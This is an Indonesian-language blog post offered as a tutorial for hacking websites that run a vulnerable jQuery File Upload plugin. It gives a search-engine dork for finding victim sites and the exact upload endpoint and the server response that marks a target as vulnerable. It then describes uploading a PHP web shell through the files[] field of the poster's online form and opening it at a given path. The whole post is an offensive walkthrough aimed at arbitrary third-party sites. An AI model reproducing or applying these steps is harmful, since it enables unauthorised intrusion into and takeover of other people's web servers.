JQuery FIle Upload Vulnerabilty
Saturday, January 13, 2018
Add Comment
Halo brad, dah lama ga ngeliat mimin ya :v oke kaya biasa. mimin mau ngasih tutor JQuery File Upload yang mimin sendiri lagi nekunin POC ini hehehe :v langsung aja >>>
Dork : inurl:/assets/global/plugins/jquery-file-upload/
nb* : kembangin lagi biar dapet yang verawan hwhw
Exploit : [PATH]/assets/global/plugins/jquery-file-upload/server/php
langsung aja dorking pake Search Engine
pilih salah satu target hehehe
langsung aja Exploit The Target ! :v : https://target.com/assets/global/plugins/jquery-file-upload/server/php/
Ciri ciri vuln : {"files":[]}
nah kalo udah nemu pake csrf onlen nya mimin aja
DISINI
masukin POST FILE nya dengan : files[]
lalu klik LOCK TARGET !
setelah itu isi dengan file yang mau kalian upload !
Akses Shell https://www.target/[PATH]/assets/global/plugins/jquery-file-upload/server/php/files/shellmu.php
boom ! :v gampang bukan ? oke mimin akhiri perjumpaan dan selamat ber Exploitasi !
0 Response to "JQuery FIle Upload Vulnerabilty"
Post a Comment